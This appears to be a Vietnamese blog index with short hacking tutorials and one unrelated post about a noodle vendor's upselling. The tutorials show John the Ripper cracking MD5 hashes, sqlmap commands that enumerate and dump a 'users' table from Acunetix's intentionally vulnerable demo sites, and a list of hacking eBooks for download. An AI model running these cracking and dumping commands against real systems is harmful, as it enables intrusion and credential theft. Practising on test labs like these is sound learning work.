• Security

    Using John to crack the password

    Đây là một cách đơn giản để crack mật khẩu thông qua chương trình “john” trên Kali.

    B1: Tạo một file txt chứa user và password.

    Mình dùng ứng dụng Leafpad tạo một file “adminpassword.txt” có cấu trúc như ảnh bên dưới và đặt trong thư mục Home > Documents > password. Sau đó vào trong thư mục password và nhấp chuột phải, chọn Open in Terminal.

    john

    B2: Chạy câu lệnh john.

    john –format=raw-MD5 adminpassword.txt

    Kết quả:

     

  • Security

    Thu thập thông tin Database bằng sqlmap

    Fingerprinting the system and database
    Site: http://testphp.vulnweb.com
    ——

    Link bị lỗi SQL Injection: http://testphp.vulnweb.com/search.php?test=query

    Get database & DB version.

    [email protected]:~# sqlmap -u “http://testphp.vulnweb.com/search.php?test=query” –b

    Get user & role.

    [email protected]:~# sqlmap -u “http://testphp.vulnweb.com/search.php?test=query” –users –roles

    Get current user, current database and hostname information.

    [email protected]:~# sqlmap -u “http://testphp.vulnweb.com/search.php?test=query” –current-user –current-db –hostname

  • Security

    Pentest & Hacking eBooks For Learning

    I have no introduction, just download it and enjoy.

    1. Black Belt Hacking & Complete Hacking Book
    2. Hackers High School 13 Complete Hacking E-books
    3. Penentration Testing With Backtrack 5
    4. A Beginners Guide To Hacking Computer Systems
    5. Black Book of Viruses and Hacking
    6. Secrets of Super and Professional Hackers
    7. Dangerours Google Hacking Database and Attacks
    8. Internet Advanced Denial of Service (DDOS) Attack
    9. Computer Hacking & Malware Attacks for Dummies
    10. G-mail Advance Hacking Guides and Tutorials
    11. Vulnerability Exploit & website Hacking for Dummies
    12. Web App Hacking (Hackers Handbook)
    13. Security Crypting Networks and Hacking
    14. Botnets The Killer Web Applications Hacking
    15. Hacking attacks and Examples Test
    16. Network Hacking and Shadows Hacking Attacks
    17. Gray Hat Hacking and Complete Guide to Hacking
    18. Advance Hacking Exposed Tutorials
    19. 501 Website Hacking Secrets
    20. Internet Security Technology and Hacking
    21. CEH Certified Ethical Hacker Study Guide
    22. Advanced SQL Injection Hacking and Guide
    23. Web Hacking & Penetration testing
    24. OWASP Hacking Tutorials and Web App Protection
    25. CEH – Hacking Database Secrets and Exploit
    26. Ethical Hacking Value and Penetration testing
    27. Hack any Website, Complete Web App Hacking
    28. Beginners Hackers and tutorials 
    29. Ethical Hacking Complete E-book for Beginners
    30. Backtrack : Advance Hacking tutorials
    31. SQL Injection attacks and tutorials by Exploit DB
    32. XSS + Vulnerability Exploitation & Website Hacking
    33. Ultimate Guide to Social Enginnering attacks
    34. White Hat Hacking complete guide to XSS Attacks 
    35. Cross Site Scripting and Hacking Websites 
    36. The Hackers Underground Handbook ( hack the system)
    37. Blind SQL Injection tutorials and Hacking
    38. Hacking Secrets Revealed
    39. Hacking Website Database and owning systems
    40. Reverse Engineering for Beginners 
    41. Reverse Enginnering (The Real Hacking)
    42. Computer Hacking
    43. Hack your Friend using Backtrack
    44. Reverse Enginnering Hacking and Cracking
    45. Hack the System for beginners
    46. Hacking into Computer Systems
    47. Blind SQL Injection Discovery & Exploitation
  • Blog

    Sự tiến bộ của cô bán bún bò Huế

    Bình thường mình rất hay ăn bún bò của cô, một phần vì gần nhà, phần còn lại là vì ngon.
    Mỗi ngày cô đều cho khách một cốc trà nóng nho nhỏ hương vị Huế miễn phí.

    Hôm nay đến ăn, có một chút thay đổi. Sau khi bưng tô bún ra thì cô lại hỏi “uống trà đá không em?”
    Khát quá nên gật đại, vậy là trả thêm 3k tiền nước.

    Nhìn xung quanh, ai cũng có ly trà đá trên bàn.
    Thì ra mọi người ai cũng muốn uống nhưng lười, đợi hỏi xong mới gật, vậy là cô lại có thêm một ít thu nhập phụ. Còn cặp đôi thì khỏi nói, chẳng có anh nào dám lắc đầu trước lời mời mang tính giải khát cao như này khi đi chung bạn gái cả.

    (Tôi mới biết là trà nóng vẫn miễn phí nếu có yêu cầu)

    Túm lại, Không biết cô học được từ ai hay do kinh nghiệm, nhưng đó là một sự tiến bộ nhẹ nhàng, một cách nhìn rất hay.

    Bài học:
    1. Đôi khi khách hàng họ cũng không có nhu cầu cho tới khi bạn gợi ý nhu cầu.
    2. Có những lời mời rất khó từ chối, xem như nghệ thuật sales đúng lúc cũng được.
    3. Dịch vụ cũ vẫn còn đó (cấm đứa nào nói biến chất, kinh tế thị trường), chỉ là không offer cùng lúc với new services, nhưng hỏi thì vẫn có nhé.

    Thôi, đi cafe! Rảnh rảnh ghé lại xem cô có bài gì mới hay ho sẽ học tiếp.

  • Security

    Basic SQL Injection with sqlmap

    SQL Injection with sqlmap
    Site: http://testphp.acunetix.com/

    =======================
    1. Check the URL.

    Chèn thử dấu ‘ phía sau địa chỉ để kiểm tra lỗi: http://testphp.acunetix.com/search.php?test=query’

    Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/search.php on line 61

    Có lỗi rồi. Mình sẽ dùng sqlmap để kiểm tra.

    [email protected]:~# sqlmap -u “http://testphp.acunetix.com/search.php?test=query” –dbs
    => Lệnh này mình dùng để kiểm tra xem trang web dùng Database tên gì (get database name)

    Cái “information_schema” là DB mặc định của MySQL. Đừng quan tâm đến nó.
    Cái “acuart” là tên của DB trang web, cái chúng ta cần.

    2. Sau khi có tên DB, chúng ta sẽ get Table.

    [email protected]:~# sqlmap -u “http://testphp.acunetix.com/search.php?test=query” –tables D acuart

    sqlmap lấy thông tin khá nhanh.

    3. Get Columns.

    [email protected]:~# sqlmap -u “http://testphp.acunetix.com/search.php?test=query” –columns D acuart

    4. Dump Data.

    Có khá nhiều bảng, mình sẽ lấy dữ liệu của bảng tên là “users”. Trong bảng này thường có nhiều thông tin cần thiết cho việc tấn công.

    [email protected]:~# sqlmap -u “http://testphp.acunetix.com/search.php?test=query” –dump -D acuart -T users

    Đến đây chúng ta đã có được thông tin cần thiết.